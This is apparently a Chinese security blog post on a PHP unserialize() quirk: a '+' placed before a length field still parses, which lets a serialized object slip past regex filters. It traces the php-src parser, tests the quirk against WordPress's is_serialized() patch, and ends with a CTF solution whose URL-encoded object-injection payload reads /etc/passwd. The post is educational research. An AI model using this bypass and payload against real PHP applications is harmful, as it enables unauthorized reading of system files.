mysql unserialize_php反序列unserialize的一个小特性与利用

一、unserialize()函数特性

wordpress存在一个反序列漏洞比较火，具体漏洞可以看这篇：http://drops.wooyun.org/papers/596，

也可以去看英文的原文：http://vagosec.org/2013/09/wordpress-php-object-injection/。

wp官网打了补丁，我试图去bypass补丁，但让我自以为成功的时候，发现我天真了，并没有成功绕过wp的补丁，但却发现了unserialize的一个小特性，在此和大家分享一下。

1.unserialize()函数相关源码：

if ((YYLIMIT - YYCURSOR) < 7) YYFILL(7);

yych = *YYCURSOR;

switch (yych) {

case 'C':

case 'O': goto yy13;

case 'N': goto yy5;

case 'R': goto yy2;

case 'S': goto yy10;

case 'a': goto yy11;

case 'b': goto yy6;

case 'd': goto yy8;

case 'i': goto yy7;

case 'o': goto yy12;

case 'r': goto yy4;

case 's': goto yy9;

case '}': goto yy14;

default: goto yy16;

}

上边这段代码是判断序列串的处理方式，如序列串O:4:”test”:1:{s:1:”a”;s:3:”aaa”;},处理这个序列串，先获取字符串第一个字符为O，然后case ‘O’:  goto yy13

yy13:

yych = *(YYMARKER = ++YYCURSOR);

if (yych == ':') goto yy17;

goto yy3;

从上边代码看出，指针移动一位指向第二个字符，判断字符是否为:，然后 goto yy17

yy17:

yych = *++YYCURSOR;

if (yybm[0+yych] & 128) {

goto yy20;

}

if (yych == '+') goto yy19;

.......

yy19:

yych = *++YYCURSOR;

if (yybm[0+yych] & 128) {

goto yy20;

}

goto yy18;

从上边代码看出，指针移动，判断下一位字符，如果字符是数字直接goto yy20，如果是’+’就goto yy19，而yy19中是对下一位字符判断，如果下一位字符是数字goto yy20，不是就goto yy18，yy18是直接退出序列处理，yy20是对object性的序列的处理，所以从上边可以看出：

都能够被unserialize反序列化，且结果相同。 2.实际测试：

var_dump(unserialize('O:+4:"test":1:{s:1:"a";s:3:"aaa";}'));

var_dump(unserialize('O:4:"test":1:{s:1:"a";s:3:"aaa";}'));

?>

输出：

object(__PHP_Incomplete_Class)#1 (2) { ["__PHP_Incomplete_Class_Name"]=> string(4) "test" ["a"]=> string(3) "aaa" }

object(__PHP_Incomplete_Class)#1 (2) { ["__PHP_Incomplete_Class_Name"]=> string(4) "test" ["a"]=> string(3) "aaa" }

其实，不光object类型处理可以多一个’+’,其他类型也可以，具体测试不做过多描述。

3.我们看下wp的补丁：

function is_serialized( $data, $strict = true ) {

// if it isn't a string, it isn't serialized

if ( ! is_string( $data ) )

return false;

$data = trim( $data );

if ( 'N;' == $data )

return true;

$length = strlen( $data );

if ( $length < 4 )

return false;

if ( ':' !== $data[1] )

return false;

if ( $strict ) {//output

$lastc = $data[ $length - 1 ];

if ( ';' !== $lastc && '}' !== $lastc )

return false;

} else {//input

$semicolon = strpos( $data, ';' );

$brace = strpos( $data, '}' );

// Either ; or } must exist.

if ( false === $semicolon && false === $brace )

return false;

// But neither must be in the first X characters.

if ( false !== $semicolon && $semicolon < 3 )

return false;

if ( false !== $brace && $brace < 4 )

return false;

}

$token = $data[0];

switch ( $token ) {

case 's' :

if ( $strict ) {

if ( '"' !== $data[ $length - 2 ] )

return false;

} elseif ( false === strpos( $data, '"' ) ) {

return false;

}

case 'a' :

case 'O' :

echo "a";

return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );

case 'b' :

case 'i' :

case 'd' :

$end = $strict ? '$' : '';

return (bool) preg_match( "/^{$token}:[0-9.E-]+;$end/", $data );

}

return false;

}

补丁中的

return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );

可以多一个’+’来绕过，虽然我们通过这个方法把序列值写入了数据库，但从数据库中提取数据，再次验证的时候却没法绕过了，我这个加号没能使数据进出数据库发生任何变化，我个人认为这个补丁绕过重点在于数据进出数据的前后变化。

4.总结

虽然没有绕过wp补丁，但这个unserialize()的小特性可能会被很多开发人员忽略，导致程序出现安全缺陷。

以上的分析有什么错误请留言指出。

5.参考

《WordPress < 3.6.1 PHP Object Injection》

http://vagosec.org/2013/09/wordpress-php-object-injection/

《var_unserializer.c源码》

https://github.com/php/php-src/blob/73cd2e0ab14d804c6bf0b689490bdd4fd6e969b1/ext/standard/var_unserializer.c

《PHP string序列化与反序列化语法解析不一致带来的安全隐患》

http://zone.wooyun.org/content/1664

二、特性利用

如某道ctf的题就考了上面通过+来绕过对对象序列化的过滤，题目如下：

其中源代码如下：

可以看到只要通过$data传入序列化的just4fun类的对象(对象的$filename值为/etc/passwd)就可以达到读取/etc/passwd文件的目的，但是发现传入序列化的对象

O:8:"just4fun":1:{s:8:"filename";s:11:"/etc/passwd";}

并不能读取文件内容，因为上面php代码在将序列化对象传入unserialize()之前有一个过滤的过程：

$token = $data[0];

$pass = true;

switch ( $token ) {

case 'a' :

case 'O' :

case 'b' :

case 'i' :

case 'd' :

$pass = ! (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );

break;

default:

$pass = false;

}

if (!$pass) {

die("TKS L.N.");

}

上面代码中过滤的最关键处就是：$pass = ! (bool) preg_match( “/^{$token}:[0-9]+:/s”, $data );，即如果传入的$data变量符合正则”/^{$token}:[0-9]+:/s”，就会跑到die(“TKS L.N.”);去，而不会执行unserialize()函数。要绕过该正则的限制，可以利用上面讲的+特性，即

O:+4:"test":1:{s:1:"a";s:3:"aaa";}

O:4:"test":1:{s:1:"a";s:3:"aaa";}

都能够被unserialize反序列化，且结果相同。

因此，获取/etc/passwd的payload是：

O:%2b8:"just4fun":1:{s:8:"filename";s:11:"/etc/passwd";}

ps:要对+进行url编码。

参考资料：